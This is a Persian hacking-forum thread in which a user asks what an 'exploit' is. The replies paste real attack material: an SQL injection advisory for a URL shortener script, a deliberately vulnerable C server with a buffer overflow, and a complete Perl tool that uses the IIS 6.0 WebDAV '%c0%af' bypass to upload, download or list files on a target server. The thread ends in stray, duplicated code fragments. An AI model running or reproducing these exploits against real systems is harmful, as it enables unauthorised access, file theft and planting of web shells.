01-24-2012، 12:32 PM
تو اكثر جاهايي كه با هك سر و كار دارن اين كلمه زياد به چشم ميخوره. مي خواستم بدونم يعني چي؟ معنيش چيه؟ به چه كاري مياد؟
امتیاز موضوع:
Title: اكسپلوييت چيه؟
حالت موضوعی |
url shortener script 1.0 sql injection Vulnerabilities
===================================================================================
# Exploit Title: url shortener script 1.0 sql injection Vulnerabilities
# Author: M.Jock3R
# Script Support Link: http://djpate.com/
# Download Script: http://www.phpkode.com/scripts/item/url-shortener-script/
# Category:: webapps
# Tested on: windows XP Sp2 FR
===================================================================================
Vuln file : show.php
Vuln Code :
if($_GET['id']){
require("mysql.php");
$id = addslashes($_GET['id']);
$getUrl = mysql_query("select url from urls where id = $id");
Exploit:
http://localhost/url-shortener-script/show.php?id=[Inj3ct]
===================================================================================
Greets To :
adelsbm / attiadona / Wjunction forum
---------------------------------
I Love you Mindy
---------------------------------
Email : madrido.jocker@gmail.com
THANKS TO ALL ALGERIANS HACK3RS
-------------------------------------------- vulnerable.c ----------------------------------------------
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#define BUFFER_SIZE 1024
#define NAME_SIZE 2048
int handling(int c)
{
char buffer[BUFFER_SIZE], name[NAME_SIZE];
int bytes;
strcpy(buffer, "My name is: ");
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
bytes = recv(c, name, sizeof(name), 0);
if (bytes == -1)
return -1;
name[bytes - 1] = ’\0’;
sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
return 0;
}
int main(int argc, char *argv[])
{
int s, c, cli_size;
struct sockaddr_in srv, cli;
if (argc != 2)
{
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return 2;
}
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;
if (bind(s, &srv, sizeof(srv)) == -1)
{
perror("bind() failed");
return 3;
}
if (listen(s, 3) == -1)
{
perror("listen() failed");
return 4;
}
for(;;)
{
c = accept(s, &cli, &cli_size);
if (c == -1)
{
perror("accept() failed");
return 5;
}
printf("client from %s", inet_ntoa(cli.sin_addr));
if (handling(c) == -1)
fprintf(stderr, "%s: handling() failed", argv[0]);
close(c);
}
return 0;
}
#!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS Windows WebDav for IIS 6.0 V1.0
use IO::Socket;
use Getopt::Long;
# Globals Go Here.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # HTTP Method, PUT GET or .
my $xpath; # WebDAV path on Webserver.
my $file; # file name.
my $httpmethod;
my $Host_Header; # The Host header has to be changed
GetOptions(
"target=s" => \$target,
"port=i" => \$port,
"method=s" => \$method,
"xpath=s" => \$xpath,
"file=s" => \$file,
"help|?" => sub {
hello();
exit;
}
);
$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put or get method\n" if ((!$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath));
$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l");
if ($error) {
print "Try IIS6_webdav_upload_file.pl -help or -?' for more information.\n$error\n";
exit;
}
hello();
if ($method eq "p") {
$httpmethod = "PUT";
} elsif ($method eq "g") {
$httpmethod = "GET";
} elsif ($method eq "l") {
$httpmethod = "PROPFIND";
} else {
print "$method Method not accept !!!\n";
exit(0);
}
# ************************************
# * We testing WebDAV methods first *
# ************************************
print "-" x 60 ."\n";
print "Testing WebDAV methods [$target $port]\n";
print "-" x 60 ."\n";
@results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
#print @results;
$flag="off";
foreach $line (@results){
if ($line =~ /^Server: /){
($left,$right)=split(/\:/,$line);
$right =~ s/ //g;
print "$target : Server type is : $right";
if ($right !~ /Microsoft-IIS/i){
print "$target : Not a Microsoft IIS Server\n";
exit(0);
}
}
if ($line =~ /^DAV: /){
$flag="on";
}
if ($line =~ /^Public: / && $flag eq "on"){
($left,$right)=split(/\:/,$line);
$right =~ s/ //g;
print "$target : Method type is : $right";
if ($right !~ /$httpmethod/i){
print "$target : Not allow $httpmethod on this WebDAV Server\n";
exit(0);
} else {
$flag="on";
}
}
}
if ($flag eq "off") {
print "$target : WebDAV disable\n";
exit(0);
}
#end of WebDAV testing.
print "-" x 60 ."\n";
my $content;
my $data;
if ($httpmethod eq "PUT") {
#cacl file size
$filesize = -s $file;
print "$file size is $filesize bytes\n";
open(INFO, $file) || die("Could not open file!");
#@lines=<INFO>;
binmode(INFO); #binary
while(read(INFO, $data, $filesize))
{
$content .= $data;
}
close(INFO);
#print $content;
$Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
} elsif ($httpmethod eq "GET") {
$Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
} elsif ($httpmethod eq "PROPFIND") {
$Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
$Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";
# ************************************
# * Sending HTTP request for WebDAV *
# ************************************
if ($httpmethod eq "PUT") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "GET") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "PROPFIND") {
@results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
}
#print @results;
$flag="off";
foreach $line (@results){
if ($line =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
$flag="on";
}
if ($line =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
$flag="off";
}
}
print "-" x 60 ."\n";
if ($flag eq "on") {
if ($httpmethod eq "PUT") {
print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
} elsif ($httpmethod eq "GET") {
my $line_no = 0;
my $counter = @results;
foreach $line (@results){
++$line_no;
if ($line =~ /^Accept-Ranges: bytes\r\n/){
last;
}
}
# Write file to disk
open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
binmode (OUTFILE);
print OUTFILE @results[$line_no+1..$counter];
close(OUTFILE);
print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";
} elsif ($httpmethod eq "PROPFIND") {
print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
foreach $line (@results){
if ($line =~ /^\<\?xml version\=/i){
my @list = split("<a:href>", $line);
foreach $path (@list) {
$no = index($path,"<");
$result.=substr($path, 0, $no)."\n";
}
print $result;
last;
}
}
}
} else {
print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";
}
print "-" x 60 ."\n";
exit(0);
# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
my ($pstr,$realip,$realport,$timeout)=@_;
my $target2 = inet_aton($realip);
my $flagexit=0;
$SIG{ALRM}=\&ermm;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
alarm($timeout);
if (connect(S,pack "SnA4x8",2,$realport,$target2)){
alarm(0);
my @in;
select(S); $|=1;
print $pstr;
alarm($timeout);
while(<S>){
if ($flagexit == 1){
close (S);
print STDOUT "Timeout\n";
return "Timeout";
}
push @in, $_;
}
alarm(0);
select(STDOUT);
close(S);
return @in;
} else {return "0";}
}
sub ermm{
$flagexit=1;
close (S);
}
sub hello{
print "\n";
print "\t #################################################\n";
print "\t # MS Windows WebDav for IIS 6.0 V1.0 #\n";
print "\t # ************* !!! WARNING !!! ************ #\n";
print "\t # ** FOR PRIVATE AND EDUCATIONAL USE ONLY! * #\n";
print "\t # ****************************************** #\n";
print "\t # Created by csg 20090524 csgcsg(at)walla.com #\n";
print "\t #################################################\n";
print "\n\t -target\t\t eg.: 127.0.0.1\n";
print "\t -port\t\t\t eg.: 80\n";
print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n";
print "\t -webdavpath\t\t eg.: webdav\n";
print "\t -file\t\t\t eg.: test.aspx\n\n";
print "\tUsage eg.: \n\tIIS6_webdav.pl -t 127.0.0.1 -p 80 -m p -x webdav -f test.aspx\n";
};
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#!/usr/bin/perl